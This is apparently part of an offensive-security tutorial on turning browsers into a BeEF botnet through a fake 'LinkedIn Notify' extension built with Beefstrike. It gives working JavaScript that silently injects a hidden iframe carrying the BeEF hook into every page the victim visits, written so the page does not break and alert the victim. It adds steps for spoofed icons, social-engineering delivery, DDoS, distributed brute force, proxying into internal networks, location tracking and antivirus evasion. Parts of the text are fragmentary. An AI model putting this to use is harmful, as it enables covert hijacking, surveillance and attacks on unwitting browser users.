This is Part 3 of our tutorial on BeEF and Armitage/Cobalt Strike integration: building a botnet of browsers by using malicious extensions.
Now that you are familiar with BeEF and the Armitage/Cobaltstrike integration by using Beefstrike, it's time to introduce a major limitation and how to overcome it.
A malicious extension can set up deep persistence for BeEF in the victim's browser, and that is a big advantage. Fortunately, Beefstrike can help you with this process.
, uncompress it and point Beefstrike to the kango.py file contained in the archive.
Go to BeEF --> Attack --> Browser Extension --> Path to Kango.
Fill the message box with the absolute path of kango.py.
The HTML code injected by Beefstrike consists of an iframe that points to a web page carrying BeEF's hook.
Go to BeEF --> Attack --> Browser Extension --> Beef-Implant.
Follow the instructions provided in each message box carefully. The first step in this process is to create the project. Beefstrike opens an external xterm window; use it to name your project. For this tutorial, we created a fake LinkedIn browser extension named "LinkedIn Notify".
When you create a project, a new folder is created to host that project's files. You can find these files in:
There are two other important steps in this process. The first is the HTML code that will be injected. Keep in mind that this code is injected by a script that looks like this:
document.body.innerHTML = document.body.innerHTML + [CODE_TO_INJECT];
And the default code to inject looks like this:
You can manually modify the extension code before generating it. The file to modify is content.js, located at: BeEF_folder/extensions/beefstrike/plugins/PROJECT_NAME/src/common/content.js.
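The injection shown above appends a string to document.body.innerHTML. That works, but assigning innerHTML re-parses the whole body, so event listeners the page attached and any form state are lost, which can visibly break the page and tip off the victim. The following is an added example, not Beefstrike's content.js, of the same iframe injection done with DOM calls instead: it creates one hidden iframe pointing at the hook page and refuses to inject twice. The hook address is an assumption (your BeEF server); the fake document at the end is a constructed stand-in so the function can be exercised outside a browser.

```javascript
// Added example, not Beefstrike's content.js: inject the BeEF hook as a
// hidden iframe using DOM calls rather than innerHTML concatenation.
const HOOK_URL = "http://192.168.56.101:3000/hook.html"; // assumption: your BeEF hook page
const FRAME_ID = "beef-hook-frame";                         // marker so a page is hooked only once

// Inject a hidden iframe that loads the BeEF hook page into `doc`.
// Returns the created element, or null when nothing was injected
// (no <body> yet, or the frame is already present because the script ran twice).
function injectHookFrame(doc, hookUrl) {
  if (!doc.body) return null;
  if (doc.getElementById(FRAME_ID)) return null;
  const frame = doc.createElement("iframe");
  frame.setAttribute("id", FRAME_ID);
  frame.setAttribute("src", hookUrl);
  // Zero size and display:none; the hook page only needs to load, not be seen.
  frame.setAttribute("style", "display:none;width:0;height:0;border:0");
  doc.body.appendChild(frame);
  return frame;
}

// When running as a real content script, hook the page once it has a body.
if (typeof document !== "undefined") {
  if (document.body) {
    injectHookFrame(document, HOOK_URL);
  } else {
    document.addEventListener("DOMContentLoaded", () => injectHookFrame(document, HOOK_URL));
  }
}

// Constructed stand-in for `document` so the injector can be run in Node.
// It models only the calls injectHookFrame makes.
function makeFakeDocument(hasBody = true) {
  const byId = new Map();
  const body = {
    children: [],
    appendChild(el) {
      this.children.push(el);
      if (el.attrs.id) byId.set(el.attrs.id, el);
    },
  };
  return {
    body: hasBody ? body : null,
    getElementById: (id) => byId.get(id) || null,
    createElement: (tag) => ({ tag, attrs: {}, setAttribute(k, v) { this.attrs[k] = v; } }),
  };
}
```

One caveat a practitioner should keep in mind: a hidden iframe still loads the hook page only if the host page's Content-Security-Policy allows it (frame-src / child-src), and the injection runs in the content-script context, so the hook itself executes inside the iframe's origin, not the host page's.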
The second important step is the modification of the project's icon. By doing so, you increase the success ratio of your social engineering scenario. Beefstrike comes with a set of icon packs ready to be used. Open the plugin_icons folder. In this folder, you have icon packs for Twitter, LinkedIn, and Facebook. You can use one of them or create your own icon pack. Each pack has five icons of different sizes; you must respect these sizes if you plan to create your own. Changing the icon of your project using an icon pack is simple: copy the icons and paste them into the project's icons folder. The path is:
Delivery and installation
The methods used to deliver a browser extension are essentially the same as those used in any attack that relies on social engineering. The most efficient ones are email and social networks. For installation, the constraints differ depending on the browser. For example, Chrome only allows users to install extensions from the official Chrome Web Store and not from third-party websites (unless the user loads an unpacked extension in developer mode), while Firefox allows installation from elsewhere. We will not dwell on this point, but you have to be aware of it.
When you use a malicious extension, keep in mind that if the browser is closed, the link with the C&C server is broken; when the browser is opened again, the link is re-established. Our malicious extension performs an HTML injection on every unsecured page the victim visits, with BeEF's hook as the payload, which makes a long-term engagement possible. Here the word "botnet" makes sense: BeEF is designed to operate like a botnet. The usual limitation is the availability of bots, or zombies, when you need them, because a zombie is normally only available while the victim is actually on the booby-trapped page, and that is a highly variable parameter. With our extension installed on a number of browsers, we have a ready-to-use botnet. Botnets are often associated with specific kinds of attack, such as distributed attacks or espionage.
As we saw in Part 02 of this tutorial:
- Beefstrike automatically geolocates every new zombie based on its IP address once it joins the horde. If a zombie leaves the horde and comes back, its new position is kept in a tracking table, and we can visualize the resulting tracking map later. To obtain a tracking map, go to BeEF --> View --> Geolocation --> Geo Tracking, select an entry in the tab, right-click and select "See map" or "Track". With the long persistence enabled by the extension, the tracking feature can provide valuable information about the user's habits.
- Beefstrike performs DDoS attacks. DDoS is well known to be carried out even by primitive botnets, and you can easily simulate this kind of attack with your botnet of browser extensions. Go to BeEF --> Attacks --> DDoS.
- Beefstrike can assist in performing distributed brute-force attacks.
Distributed brute-force attack using Ravan
. We reduce the HTML code as you will see here. The file worker.php
With the resulting code of listing 1, zombies become workers once the job URL is submitted to them. It is possible to check the status of a job for a particular worker: right-click on a zombie entry in the "zombies" tab.
Go to Attack --> Raw JS.
You can set up a tunnel by right-clicking on a zombie listed in the "zombies" tab and selecting Attack --> Proxify.
Once the proxy tunnel has been set up, you can start browsing the web resources of the victim's internal network. You have to modify your browser's proxy configuration to use BeEF's proxy parameters. The BeEF team explains this process very well; I recommend taking a look at their blog.
Most antivirus software is not able to identify a malicious browser extension as such and remove it. This is another reason why this kind of attack represents a serious threat to your privacy.
BeEF hooks are not always detected by antivirus products, and they can be compressed and obfuscated by changing a few lines in BeEF's configuration files. We used the VirusTotal service to check the detection rate of this extension as a malicious extension. The result is not reassuring, as you can see in. It is alarming to see how this simple trick slips through the net of so much antivirus software. The malicious extension in this scenario uses a basic iframe injection; no special tricks were used to make detection harder for defensive solutions. A video demo to illustrate how this extension works is coming soon!
Thanks for reading, and hack responsibly.